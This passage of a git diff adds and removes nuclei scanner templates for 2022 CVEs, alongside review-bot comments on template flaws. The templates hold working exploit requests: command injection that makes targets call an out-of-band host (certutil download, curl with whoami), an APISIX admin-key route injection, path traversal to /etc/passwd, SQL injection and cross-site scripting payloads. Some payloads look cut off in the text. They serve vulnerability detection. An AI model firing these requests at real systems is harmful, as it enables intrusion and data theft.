+ - https://nvd.nist.gov/vuln/detail/CVE-2022-23134
+ - https://support.zabbix.com/browse/ZBX-20384
+ - https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/6SZYHXINBKCY42ITFSNCYE7KCSF33VRA/
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N
+ cvss-score: 5.3
+ cve-id: CVE-2022-23134
+ tags: cve,cve2022,zabbix,auth-bypass
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/zabbix/setup.php"
+ - "{{BaseURL}}/setup.php"
+
+ headers:
+ Cookie: "zbx_session=eyJzZXNzaW9uaWQiOiJJTlZBTElEIiwiY2hlY2tfZmllbGRzX3Jlc3VsdCI6dHJ1ZSwic3RlcCI6Niwic2VydmVyQ2hlY2tSZXN1bHQiOnRydWUsInNlcnZlckNoZWNrVGltZSI6MTY0NTEyMzcwNCwic2lnbiI6IklOVkFMSUQifQ%3D%3D"
+
+ stop-at-first-match: true
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - "Database"
+ - "host"
+ - "port"
+ - "Zabbix"
+ condition: and
+
+ - type: status
+ status:
+ - 200
+
+# Enhanced by mp on 2022/03/08
diff --git a/nuclei-templates/CVE-2022/cve-2022-23779.yaml b/nuclei-templates/CVE-2022/cve-2022-23779.yaml
deleted file mode 100644
index e42ca66955..0000000000
--- a/nuclei-templates/CVE-2022/cve-2022-23779.yaml
+++ /dev/null
@@ -1,61 +0,0 @@ -id: CVE-2022-23779 - -info: - name: Zoho ManageEngine - Internal Hostname Disclosure - author: cckuailong - severity: medium - description: Zoho ManageEngine Desktop Central before 10.1.2137.8 exposes the installed server name to anyone. The internal hostname can be discovered by reading HTTP redirect responses. - reference: - - https://www.manageengine.com/products/desktop-central/cve-2022-23779.html - - https://github.com/fbusr/CVE-2022-23779 - - https://nvd.nist.gov/vuln/detail/CVE-2022-23779 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N - cvss-score: 5.3 - cve-id: CVE-2022-23779 - cwe-id: CWE-200 - metadata: - fofa-query: app="ZOHO-ManageEngine-Desktop" - tags: cve,cve2022,zoho,exposure - -requests: - - method: GET - path: - - "{{BaseURL}}/themes" - - matchers-condition: and - matchers: - - type: status - status: - - 301 - - - type: word - part: header - words: - - '/themes/' - - 'text/html' - condition: and - - - type: word - part: location - words: - - '{{Host}}' - negative: true - - - type: word - words: - - '

301 Moved Permanently

' - - - type: regex - part: location - regex: - - 'https?:\/\/(.*):' - - extractors: - - type: regex - part: location - group: 1 - regex: - - 'https?:\/\/(.*):' - -# Enhanced by mp on 2022/03/28 diff --git a/nuclei-templates/CVE-2022/cve-2022-23881.yaml b/nuclei-templates/CVE-2022/cve-2022-23881.yaml new file mode 100644 index 0000000000..73150a422c --- /dev/null +++ b/nuclei-templates/CVE-2022/cve-2022-23881.yaml @@ -0,0 +1,37 @@ +id: CVE-2022-23881 + +info: + name: ZZZCMS zzzphp 2.1.0 - Remote Code Execution + author: pikpikcu + severity: critical + description: ZZZCMS zzzphp v2.1.0 is susceptible to a remote command execution vulnerability via danger_key() at zzz_template.php. + reference: + - https://github.com/metaStor/Vuls/blob/main/zzzcms/zzzphp%20V2.1.0%20RCE/zzzphp%20V2.1.0%20RCE.md + - http://www.zzzcms.com + - https://nvd.nist.gov/vuln/detail/CVE-2022-23881 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2022-23881 + cwe-id: CWE-77 + tags: cve,cve2022,rce,zzzphp,zzzcms + +requests: + - raw: + - | + GET /?location=search HTTP/1.1 + Host: {{Hostname}} + Cookies: keys={if:=`certutil -urlcache -split -f https://{{interactsh-url}}/poc`}{end if} + + matchers-condition: and + matchers: + - type: word + part: interactsh_protocol + words: + - "http" + + - type: status + status: + - 500 + +# Enhanced by mp on 2022/04/19 diff --git a/nuclei-templates/CVE-2022/CVE-2022-23944.yaml b/nuclei-templates/CVE-2022/cve-2022-23944.yaml similarity index 100% rename from nuclei-templates/CVE-2022/CVE-2022-23944.yaml rename to nuclei-templates/CVE-2022/cve-2022-23944.yaml diff --git a/nuclei-templates/CVE-2022/cve-2022-24112.yaml b/nuclei-templates/CVE-2022/cve-2022-24112.yaml new file mode 100644 index 0000000000..119a801f06 --- /dev/null +++ b/nuclei-templates/CVE-2022/cve-2022-24112.yaml 
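Review bot: The cve-2022-23881.yaml check can only fire on Windows hosts, because the callback in the request header is made with `certutil`, and the template says so nowhere. A vulnerable zzzphp install on any other platform produces no interaction and is reported clean, which a reader of the scan report cannot tell from a patched one. State the limit in the template, for example `# Windows-only check (callback uses certutil); a negative result on other platforms is not conclusive`. The header is also spelled `Cookies:` rather than `Cookie:`; that may be intentional, but it is worth confirming against the referenced write-up.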
@@ -0,0 +1,80 @@
+id: CVE-2022-24112
+
+info:
+ name: Apache APISIX - Remote Code Execution
+ author: Mr-xn
+ severity: critical
+ description: A default configuration of Apache APISIX (with default API key) is vulnerable to remote code execution. An attacker can abuse the batch-requests plugin to send requests to bypass the IP restriction of Admin API. When the admin key was changed or the port of Admin API was changed to a port different from the data panel, the impact is lower. But there is still a risk to bypass the IP restriction of Apache APISIX's data panel. There is a check in the batch-requests plugin which overrides the client IP with its real remote IP. But due to a bug in the code, this check can be bypassed.
+ reference:
+ - https://www.openwall.com/lists/oss-security/2022/02/11/3
+ - https://twitter.com/sirifu4k1/status/1496043663704858625
+ - https://apisix.apache.org/zh/docs/apisix/plugins/batch-requests
+ - https://nvd.nist.gov/vuln/detail/CVE-2022-24112
+ remediation: Upgrade to 2.10.4 or 2.12.1. Or, explicitly configure the enabled plugins in `conf/config.yaml` and ensure `batch-requests` is disabled. (Or just comment out `batch-requests` in `conf/config-default.yaml`).
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 9.8
+ cve-id: CVE-2022-24112
+ cwe-id: CWE-290
+ metadata:
+ fofa-query: title="Apache APISIX Dashboard"
+ product: https://apisix.apache.org
+ shodan-query: title:"Apache APISIX Dashboard"
+ tags: cve,cve2022,apache,rce,apisix,oast
+
+requests:
+ - raw:
+ - |
+ POST /apisix/batch-requests HTTP/1.1
+ Host: {{Hostname}}
+ Content-Type: application/json
+ Accept-Encoding: gzip, deflate
+ Accept-Language: zh-CN,zh;q=0.9
+
+ {
+ "headers":{
+ "X-Real-IP":"127.0.0.1",
+ "Content-Type":"application/json"
+ },
+ "timeout":1500,
+ "pipeline":[
+ {
+ "method":"PUT",
+ "path":"/apisix/admin/routes/index?api_key=edd1c9f034335f136f87ad84b625c8f1",
+ "body":"{\r\n \"name\": \"test\", \"method\": [\"GET\"],\r\n \"uri\": \"/api/{{randstr}}\",\r\n \"upstream\":{\"type\":\"roundrobin\",\"nodes\":{\"httpbin.org:80\":1}}\r\n,\r\n\"filter_func\": \"function(vars) os.execute('curl https://{{interactsh-url}}/`whoami`'); return true end\"}"
+ }
+ ]
+ }
+ - |
+ GET /api/{{randstr}} HTTP/1.1
+ Host: {{Hostname}}
+ Accept-Encoding: gzip, deflate
+ Accept-Language: zh-CN,zh;q=0.9
+
+ req-condition: true
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body_1
+ words:
+ - '"reason":"OK"'
+ - '"status":200'
+ condition: and
+
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ part: interactsh_protocol
+ words:
+ - 'http'
+
+ extractors:
+ - type: regex
+ part: interactsh_request
+ group: 1
+ regex:
+ - 'GET \/([a-z-]+) HTTP'
+
+# Enhanced by mp on 2022/04/22
diff --git a/nuclei-templates/CVE-2022/cve-2022-24129.yaml b/nuclei-templates/CVE-2022/cve-2022-24129.yaml
new file mode 100644
index 0000000000..9d3dc396c3
--- /dev/null
+++ b/nuclei-templates/CVE-2022/cve-2022-24129.yaml
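Review bot: The first request is not a read-only probe: through the batch `pipeline` it issues a `PUT` to `/apisix/admin/routes/index` that registers a route named `test` with a `filter_func`, and nothing in the template removes it afterwards. After a positive scan the route stays on the gateway and its filter runs again on every request to that `uri`, so the scan itself changes the state of the system under test. Mark the template so it is kept out of default runs, `tags: cve,cve2022,apache,rce,apisix,oast,intrusive`, and add a comment above `requests:` such as `# leaves route "index" (name "test") on the target; remove it via the Admin API after a positive result`.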
@@ -0,0 +1,37 @@
+id: CVE-2022-24129
+
+info:
+ name: Shibboleth OIDC OP <3.0.4 - Server-Side Request Forgery
+ author: 0x_Akoko
+ severity: high
+ description: The Shibboleth Identity Provider OIDC OP plugin before 3.0.4 is vulnerable to server-side request forgery (SSRF) due to insufficient restriction of the request_uri parameter, which allows attackers to interact with arbitrary third-party HTTP services.
+ reference:
+ - https://github.com/sbaresearch/advisories/tree/public/2022/SBA-ADV-20220127-01_Shibboleth_IdP_OIDC_OP_Plugin_SSRF
+ - https://shibboleth.atlassian.net/wiki/spaces/IDPPLUGINS/pages/1376878976/OIDC+OP
+ - http://shibboleth.net/community/advisories/
+ - https://nvd.nist.gov/vuln/detail/CVE-2022-24129
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:H/A:N
+ cvss-score: 8.2
+ cve-id: CVE-2022-24129
+ cwe-id: CWE-918
+ tags: cve,cve2022,ssrf,oidc,shibboleth
+
+requests:
+ - method: GET
+ path:
+ - '{{BaseURL}}/idp/profile/oidc/authorize?client_id=demo_rp&request_uri=https://{{interactsh-url}}'
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: interactsh_protocol # Confirms the HTTP Interaction
+ words:
+ - "http"
+
+ - type: word
+ part: interactsh_request
+ words:
+ - "ShibbolethIdp"
+
+# Enhanced by mp on 2022/07/15
diff --git a/nuclei-templates/CVE-2022/cve-2022-24181.yaml b/nuclei-templates/CVE-2022/cve-2022-24181.yaml
deleted file mode 100644
index e4d4fbe5a6..0000000000
--- a/nuclei-templates/CVE-2022/cve-2022-24181.yaml
+++ /dev/null
@@ -1,46 +0,0 @@ -id: CVE-2022-24181 - -info: - name: PKP Open Journal Systems 2.4.8-3.3 - Cross-Site Scripting - author: lucasljm2001,ekrause - severity: medium - description: | - PKP Open Journal Systems 2.4.8 to 3.3 contains a cross-site scripting vulnerability which allows remote attackers to inject arbitrary code via the X-Forwarded-Host Header. - reference: - - https://www.exploit-db.com/exploits/50881 - - https://github.com/pkp/pkp-lib/issues/7649 - - https://youtu.be/v8-9evO2oVg - - https://nvd.nist.gov/vuln/detail/cve-2022-24181 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 - cve-id: CVE-2022-24181 - cwe-id: CWE-79 - metadata: - verified: "true" - tags: cve,cve2022,xss,oss,pkp-lib,edb - -requests: - - raw: - - | - GET /iupjournals/index.php/esj HTTP/2 - Host: {{Hostname}} - X-Forwarded-Host: foo">alert(document.domain)' + - '' + condition: and + + - type: word + part: header + words: + - 'text/xml' + + - type: status + status: + - 200 + +# Enhanced by mp on 2022/03/23 diff --git a/nuclei-templates/CVE-2022/cve-2022-26233.yaml b/nuclei-templates/CVE-2022/cve-2022-26233.yaml new file mode 100644 index 0000000000..7a7376e711 --- /dev/null +++ b/nuclei-templates/CVE-2022/cve-2022-26233.yaml 
@@ -0,0 +1,34 @@
+id: CVE-2022-26233
+
+info:
+ name: Barco Control Room Management Suite - Directory Traversal
+ author: 0x_Akoko
+ severity: high
+ description: Barco Control Room Management through Suite 2.9 Build 0275 was discovered to be vulnerable to directory traversal, allowing attackers to access sensitive information and components. Requests must begin with the "GET /..\.." substring.
+ reference:
+ - https://0day.today/exploit/37579
+ - https://www.cvedetails.com/cve/CVE-2022-26233
+ - http://seclists.org/fulldisclosure/2022/Apr/0
+ - http://packetstormsecurity.com/files/166577/Barco-Control-Room-Management-Suite-Directory-Traversal.html
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+ cvss-score: 7.5
+ cve-id: CVE-2022-26233
+ cwe-id: CWE-22
+ tags: cve,cve2022,barco,lfi
+
+requests:
+ - raw:
+ - |+
+ GET /..\..\..\..\..\..\..\..\..\..\windows\win.ini HTTP/1.1
+ Host: {{Hostname}}
+
+ unsafe: true
+ matchers:
+ - type: word
+ part: body
+ words:
+ - "bit app support"
+ - "fonts"
+ - "extensions"
+ condition: and
diff --git a/nuclei-templates/CVE-2022/cve-2022-26960.yaml b/nuclei-templates/CVE-2022/cve-2022-26960.yaml
new file mode 100644
index 0000000000..d244810944
--- /dev/null
+++ b/nuclei-templates/CVE-2022/cve-2022-26960.yaml
@@ -0,0 +1,40 @@
+id: CVE-2022-26960
+
+info:
+ name: elFinder <=2.1.60 - Local File Inclusion
+ author: pikpikcu
+ severity: critical
+ description: |
+ elFinder through 2.1.60 is affected by local file inclusion via connector.minimal.php. This allows unauthenticated remote attackers to read, write, and browse files outside the configured document root. This is due to improper handling of absolute file paths.
+ reference:
+ - https://www.synacktiv.com/publications/elfinder-the-story-of-a-repwning.html
+ - https://github.com/Studio-42/elFinder/commit/3b758495538a448ac8830ee3559e7fb2c260c6db
+ - https://www.synacktiv.com/publications.html
+ - https://nvd.nist.gov/vuln/detail/CVE-2022-26960
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N
+ cvss-score: 9.1
+ cve-id: CVE-2022-26960
+ cwe-id: CWE-22
+ metadata:
+ verified: true
+ tags: cve,cve2022,lfi,elfinder
+
+requests:
+ - raw:
+ - |
+ GET /elfinder/php/connector.minimal.php?cmd=file&target=l1_<@base64>/var/www/html/elfinder/files//..//..//..//..//..//../etc/passwd<@/base64>&download=1 HTTP/1.1
+ Host: {{Hostname}}
+ Content-Type: application/x-www-form-urlencoded
+
+ matchers-condition: and
+ matchers:
+ - type: regex
+ regex:
+ - "root:.*:0:0:"
+
+ - type: status
+ status:
+ - 200
+
+# Enhanced by mp on 2022/07/05
diff --git a/nuclei-templates/CVE-2022/cve-2022-27927.yaml b/nuclei-templates/CVE-2022/cve-2022-27927.yaml
new file mode 100644
index 0000000000..64d50a460c
--- /dev/null
+++ b/nuclei-templates/CVE-2022/cve-2022-27927.yaml
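Review bot: The `target=` parameter encodes an absolute path beginning with `/var/www/html/elfinder/files/`, and the request line is fixed to `/elfinder/php/connector.minimal.php`, so the check covers exactly one install layout. An elFinder deployed under any other document root or URL prefix will not match, and the scan reports it clean even if it is vulnerable. Record the assumption next to the request, for example `# assumes elFinder installed at /var/www/html/elfinder; other install paths are not covered`. Minor: `verified: true` is unquoted here while the other templates added in this commit write `verified: "true"`.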
@@ -0,0 +1,44 @@
+id: CVE-2022-27927
+
+info:
+ name: Microfinance Management System 1.0 - SQL Injection
+ author: lucasljm2001,ekrause
+ severity: critical
+ description: |
+ Microfinance Management System 1.0 is susceptible to SQL Injection.
+ reference:
+ - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-27927
+ - https://www.sourcecodester.com/sites/default/files/download/oretnom23/mims_0.zip
+ - https://www.exploit-db.com/exploits/50891
+ - https://nvd.nist.gov/vuln/detail/CVE-2022-27927
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 9.8
+ cve-id: CVE-2022-27927
+ cwe-id: CWE-89
+ metadata:
+ verified: "true"
+ tags: microfinance,edb,cve,cve2022,sqli
+
+variables:
+ num: "999999999"
+
+requests:
+ - raw:
+ - |
+ GET /mims/updatecustomer.php?customer_number=-1'%20UNION%20ALL%20SELECT%20NULL,NULL,CONCAT(md5({{num}}),1,2),NULL,NULL,NULL,NULL,NULL,NULL' HTTP/1.1
+ Host: {{Hostname}}
+
+ matchers-condition: and
+ matchers:
+
+ - type: word
+ part: body
+ words:
+ - '{{md5({{num}})}}'
+
+ - type: status
+ status:
+ - 200
+
+# Enhanced by mp on 2022/07/04
diff --git a/nuclei-templates/CVE-2022/cve-2022-28079.yaml b/nuclei-templates/CVE-2022/cve-2022-28079.yaml
deleted file mode 100644
index c1b122ba24..0000000000
--- a/nuclei-templates/CVE-2022/cve-2022-28079.yaml
+++ /dev/null
@@ -1,45 +0,0 @@ -id: CVE-2022-28079 - -info: - name: College Management System 1.0 - SQL Injection - author: ritikchaddha - severity: high - description: | - College Management System 1.0 contains a SQL injection vulnerability via the course code parameter. - reference: - - https://github.com/erengozaydin/College-Management-System-course_code-SQL-Injection-Authenticated - - https://download.code-projects.org/details/1c3b87e5-f6a6-46dd-9b5f-19c39667866f - - https://nvd.nist.gov/vuln/detail/CVE-2022-28079 - - https://code-projects.org/college-management-system-in-php-with-source-code/ - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H - cvss-score: 8.8 - cve-id: CVE-2022-28079 - cwe-id: CWE-89 - metadata: - verified: "true" - tags: cve,cve2022,sqli,cms,collegemanagement - -variables: - num: "999999999" - -requests: - - raw: - - | - POST /admin/asign-single-student-subjects.php HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded - - submit=Press&roll_no=3&course_code=sd' UNION ALL SELECT CONCAT(md5({{num}}),12,21),NULL,NULL,NULL,NULL# - - matchers-condition: and - matchers: - - type: word - words: - - '{{md5({{num}})}}' - - - type: status - status: - - 302 - -# Enhanced by mp on 2022/07/15 diff --git a/nuclei-templates/CVE-2022/cve-2022-28080.yaml b/nuclei-templates/CVE-2022/cve-2022-28080.yaml new file mode 100644 index 0000000000..021d8a2b18 --- /dev/null +++ b/nuclei-templates/CVE-2022/cve-2022-28080.yaml 
@@ -0,0 +1,72 @@
+id: CVE-2022-28080
+
+info:
+ name: Royal Event - SQL Injection
+ author: lucasljm2001,ekrause,ritikchaddha
+ severity: high
+ description: |
+ Royal Event is vulnerable to a SQL injection vulnerability.
+ reference:
+ - https://www.exploit-db.com/exploits/50934
+ - https://www.sourcecodester.com/sites/default/files/download/oretnom23/Royal%20Event.zip
+ - https://github.com/erengozaydin/Royal-Event-Management-System-todate-SQL-Injection-Authenticated
+ - https://nvd.nist.gov/vuln/detail/CVE-2022-28080
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 8.8
+ cve-id: CVE-2022-28080
+ tags: royalevent,edb,cve,cve2022,sqli,authenticated,cms
+
+requests:
+ - raw:
+ - |
+ POST /royal_event/ HTTP/1.1
+ Host: {{Hostname}}
+ Content-Length: 353
+ Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryCSxQll1eihcqgIgD
+
+ ------WebKitFormBoundaryCSxQll1eihcqgIgD
+ Content-Disposition: form-data; name="username"
+
+ {{username}}
+ ------WebKitFormBoundaryCSxQll1eihcqgIgD
+ Content-Disposition: form-data; name="password"
+
+ {{password}}
+ ------WebKitFormBoundaryCSxQll1eihcqgIgD
+ Content-Disposition: form-data; name="login"
+
+
+ ------WebKitFormBoundaryCSxQll1eihcqgIgD--
+
+ - |
+ POST /royal_event/btndates_report.php HTTP/1.1
+ Host: {{Hostname}}
+ Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryFboH5ITu7DsGIGrD
+
+ ------WebKitFormBoundaryFboH5ITu7DsGIGrD
+ Content-Disposition: form-data; name="todate"
+
+ 1' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(md5("{{randstr}}"),0x1,0x2),NULL-- -
+ ------WebKitFormBoundaryFboH5ITu7DsGIGrD
+ Content-Disposition: form-data; name="search"
+
+ 3
+ ------WebKitFormBoundaryFboH5ITu7DsGIGrD
+ Content-Disposition: form-data; name="fromdate"
+
+ 01/01/2011
+ ------WebKitFormBoundaryFboH5ITu7DsGIGrD--
+
+ cookie-reuse: true
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ -
'{{md5("{{randstr}}")}}'
+
+ - type: status
+ status:
+ - 200
+
+# Enhanced by mp on 2022/07/15
diff --git a/nuclei-templates/CVE-2022/cve-2022-28219.yaml b/nuclei-templates/CVE-2022/cve-2022-28219.yaml
new file mode 100644
index 0000000000..16c51b8734
--- /dev/null
+++ b/nuclei-templates/CVE-2022/cve-2022-28219.yaml
@@ -0,0 +1,58 @@
+id: CVE-2022-28219
+
+info:
+ name: Zoho ManageEngine ADAudit Plus <7600 - XML Entity Injection/Remote Code Execution
+ author: dwisiswant0
+ severity: critical
+ description: |
+ Zoho ManageEngine ADAudit Plus before version 7060 is vulnerable to an
+ unauthenticated XML entity injection attack that can lead to remote code execution.
+ reference:
+ - https://www.manageengine.com/products/active-directory-audit/cve-2022-28219.html
+ - https://www.horizon3.ai/red-team-blog-cve-2022-28219/
+ - https://manageengine.com
+ - https://nvd.nist.gov/vuln/detail/CVE-2022-28219
+ remediation: |
+ Update to ADAudit Plus build 7060 or later, and ensure ADAudit Plus
+ is configured with a dedicated service account with restricted privileges.
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 9.8
+ cve-id: CVE-2022-28219
+ cwe-id: CWE-611
+ metadata:
+ shodan-query: http.title:"ADAudit Plus" || http.title:"ManageEngine - ADManager Plus"
+ verified: "true"
+ tags: cve,cve2022,xxe,rce,zoho,manageengine,unauth
+
+requests:
+ - method: POST
+ path:
+ - "{{BaseURL}}/api/agent/tabs/agentData"
+
+ headers:
+ Content-Type: application/json
+ body: |
+ [
+ {
+ "DomainName": "{{Host}}",
+ "EventCode": 4688,
+ "EventType": 0,
+ "TimeGenerated": 0,
+ "Task Content": " %xxe; ]>"
+ }
+ ]
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: interactsh_protocol # Confirms the HTTP Interaction
+ words:
+ - "http"
+
+ - type: word
+ part: body
+ words:
+ - "ManageEngine"
+
+# Enhanced by mp on 2022/07/04
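Review bot: The login request in cve-2022-28080.yaml pins `Content-Length: 353` while its multipart body contains `{{username}}` and `{{password}}`, whose length changes with every credential pair. If the header is sent as written, credentials of a different length than the ones the value was captured with give a truncated or over-long body, the login fails, and the second request is then evaluated without a session. Delete the `Content-Length: 353` line so the client computes it, as the second request in the same template already does. The `classification` block also lacks a `cwe-id`, where the other SQL injection template added here (cve-2022-27927.yaml) carries `cwe-id: CWE-89`.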
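Review bot: The `name` of cve-2022-28219.yaml says `<7600`, but the description ("before version 7060") and the remediation ("build 7060 or later") both give 7060. Anyone triaging from the finding title alone would treat patched builds between 7060 and 7600 as vulnerable. Change the line to `name: Zoho ManageEngine ADAudit Plus <7060 - XML Entity Injection/Remote Code Execution`.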
diff --git a/nuclei-templates/CVE-2022/cve-2022-29014.yaml b/nuclei-templates/CVE-2022/cve-2022-29014.yaml
new file mode 100644
index 0000000000..b7c1a26f7f
--- /dev/null
+++ b/nuclei-templates/CVE-2022/cve-2022-29014.yaml
@@ -0,0 +1,38 @@
+id: CVE-2022-29014
+
+info:
+ name: Razer Sila Gaming Router 2.0.441_api-2.0.418 - Local File Inclusion
+ author: edoardottt
+ severity: high
+ description: Razer Sila Gaming Router 2.0.441_api-2.0.418 is vulnerable to local file inclusion which could allow attackers to read arbitrary files.
+ reference:
+ - https://www.exploit-db.com/exploits/50864
+ - https://nvd.nist.gov/vuln/detail/CVE-2022-29014
+ - https://www2.razer.com/ap-en/desktops-and-networking/razer-sila
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+ cvss-score: 7.5
+ cve-id: CVE-2022-29014
+ tags: cve,cve2022,razer,lfi,router,edb
+
+requests:
+ - raw:
+ - |
+ POST /ubus/ HTTP/1.1
+ Host: {{Hostname}}
+ Content-Type: application/x-www-form-urlencoded
+
+ {"jsonrpc":"2.0","id":3,"method":"call","params":["4183f72884a98d7952d953dd9439a1d1","file","read",{"path":"/etc/passwd"}]}
+
+ matchers-condition: and
+ matchers:
+
+ - type: regex
+ regex:
+ - "root:.*:0:0:"
+
+ - type: status
+ status:
+ - 200
+
+# Enhanced by mp on 2022/07/15
diff --git a/nuclei-templates/CVE-2022/cve-2022-29298.yaml b/nuclei-templates/CVE-2022/cve-2022-29298.yaml
new file mode 100644
index 0000000000..2f75e09114
--- /dev/null
+++ b/nuclei-templates/CVE-2022/cve-2022-29298.yaml
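Review bot: The JSON-RPC body passes a fixed 32-hex string, `4183f72884a98d7952d953dd9439a1d1`, as the first element of `params`, which in a ubus `call` appears to be the session identifier. If that value was copied from one device's session in the referenced advisory, the template gives no reason to expect other devices to accept it, and a rejected call would make a vulnerable router look clean. Add a comment saying where the value comes from and why it is expected to be valid on every target. The body is also JSON while the header says `Content-Type: application/x-www-form-urlencoded`; `application/json` would describe what is sent.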
@@ -0,0 +1,39 @@
+id: CVE-2022-29298
+
+info:
+ name: SolarView Compact 6.00 - Local File Inclusion
+ author: ritikchaddha
+ severity: high
+ description: SolarView Compact 6.00 is vulnerable to local file inclusion which could allow attackers to access sensitive files.
+ reference:
+ - https://www.exploit-db.com/exploits/50950
+ - https://drive.google.com/file/d/1-RHw9ekVidP8zc0xpbzBXnse2gSY1xbH/view
+ - https://drive.google.com/file/d/1-RHw9ekVidP8zc0xpbzBXnse2gSY1xbH/view?usp=sharing
+ - https://nvd.nist.gov/vuln/detail/CVE-2022-29298
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+ cvss-score: 7.5
+ cve-id: CVE-2022-29298
+ cwe-id: CWE-22
+ metadata:
+ shodan-query: http.html:"SolarView Compact"
+ verified: "true"
+ tags: lfi,solarview,edb,cve,cve2022
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/downloader.php?file=../../../../../../../../../../../../../etc/passwd%00.jpg"
+
+ matchers-condition: and
+ matchers:
+ - type: regex
+ part: body
+ regex:
+ - "root:.*:0:0:"
+
+ - type: status
+ status:
+ - 200
+
+# Enhanced by mp on 2022/07/15
diff --git a/nuclei-templates/CVE-2022/cve-2022-29383.yaml b/nuclei-templates/CVE-2022/cve-2022-29383.yaml
new file mode 100644
index 0000000000..c0522654b9
--- /dev/null
+++ b/nuclei-templates/CVE-2022/cve-2022-29383.yaml
@@ -0,0 +1,46 @@ +id: CVE-2022-29383 + +info: + name: NETGEAR ProSafe SSL VPN firmware - SQL Injection + author: elitebaz + severity: critical + description: | + NETGEAR ProSafe SSL VPN multiple firmware versions were discovered to contain a SQL injection vulnerability via USERDBDomains.Domainname at cgi-bin/platform.cgi. + reference: + - http://cve.mitre.org/cgi-bin/cvename.cgi?name=2022-29383 + - https://github.com/badboycxcc/Netgear-ssl-vpn-20211222-CVE-2022-29383 + - https://nvd.nist.gov/vuln/detail/CVE-2022-29383 + - https://github.com/badboycxcc/Netgear-ssl-vpn-20211222 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2022-29383 + metadata: + verified: "true" + tags: cve,cve2022,sqli,netgear,router + +requests: + - raw: + - | + POST /scgi-bin/platform.cgi HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded; charset=utf-8 + + thispage=index.htm&USERDBUsers.UserName=NjVI&USERDBUsers.Password=&USERDBDomains.Domainname=geardomain'+AND+'5434'%3d'5435'+AND+'MwLj'%3d'MwLj&button.login.USERDBUsers.router_status=Login&Login.userAgent=MDpd + + - | + POST /scgi-bin/platform.cgi HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded; charset=utf-8 + + thispage=index.htm&USERDBUsers.UserName=NjVI&USERDBUsers.Password=&USERDBDomains.Domainname=geardomain'+AND+'5434'%3d'5434'+AND+'MwLj'%3d'MwLj&button.login.USERDBUsers.router_status=Login&Login.userAgent=MDpd + + req-condition: true + matchers: + - type: dsl + dsl: + - contains(body_1, "User authentication Failed") + - contains(body_2, "User Login Failed for SSLVPN User.") + condition: and + +# Enhanced by mp on 2022/07/04 diff --git a/nuclei-templates/CVE-2022/cve-2022-29548.yaml b/nuclei-templates/CVE-2022/cve-2022-29548.yaml new file mode 100644 index 0000000000..5b26802bf7 --- /dev/null +++ b/nuclei-templates/CVE-2022/cve-2022-29548.yaml 
@@ -0,0 +1,44 @@ +id: CVE-2022-29548 + +info: + name: WSO2 - Cross-Site Scripting + author: edoardottt + severity: medium + description: | + WSO2 contains a reflected cross-site scripting vulnerability in the Management Console of API Manager 2.2.0, 2.5.0, 2.6.0, 3.0.0, 3.1.0, 3.2.0, and 4.0.0; API Manager Analytics 2.2.0, 2.5.0, and 2.6.0; API Microgateway 2.2.0; Data Analytics Server 3.2.0; Enterprise Integrator 6.2.0, 6.3.0, 6.4.0, 6.5.0, and 6.6.0; IS as Key Manager 5.5.0, 5.6.0, 5.7.0, 5.9.0, and 5.10.0; Identity Server 5.5.0, 5.6.0, 5.7.0, 5.9.0, 5.10.0, and 5.11.0; Identity Server Analytics 5.5.0 and 5.6.0; and WSO2 Micro Integrator 1.0.0. + reference: + - https://docs.wso2.com/display/Security/Security+Advisory+WSO2-2021-1603 + - https://nvd.nist.gov/vuln/detail/CVE-2022-29548 + - http://packetstormsecurity.com/files/167587/WSO2-Management-Console-Cross-Site-Scripting.html + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2022-29548 + cwe-id: CWE-79 + 